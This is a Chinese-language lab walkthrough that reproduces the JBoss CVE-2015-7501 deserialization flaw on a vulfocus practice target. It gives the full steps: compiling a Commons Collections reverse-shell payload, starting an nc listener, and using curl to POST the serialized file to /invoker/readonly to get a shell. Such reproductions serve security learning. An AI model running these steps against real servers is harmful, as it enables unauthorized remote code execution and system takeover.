jboss CVE-2015-7501 反序列化漏洞复现


JBOSS反序列化漏洞 环境: vulfocus jboss CVE-2015-7501 云服务器 kali攻击机 基本原理:JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,可以通过Apache Commons Collections中的Gadget执行任意代码 访问网站页面 invoker/JMXInvokerServlet 页面如果出现这个页面,则证明存在漏洞
工具下载地址:https://github.com/ianxtianxt/CVE-2015-7501/ 下载完成后在kali上解压 进入到文件夹目录 这里kali没有带javac命令,需要自己下载相关配置 使用命令安装jdk apt install default-jdk 然后执行命令 javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java 执行完成后再执行另一条命令 java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap ip:port 完成后生成一个ReverseShellCommonsCollectionsHashMap.ser文件,注意这里的ip和端口就是反弹到服务器的ip和监听的端口 然后在服务器上使用nc开启监听 nc -lvnp port 这里服务器的ip和监听的的端口就是上文的ip和端口 然后在kali执行命令进行反弹shell curl http://vulfocus.fofa.so:60494/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser 查看服务器,反弹shell成功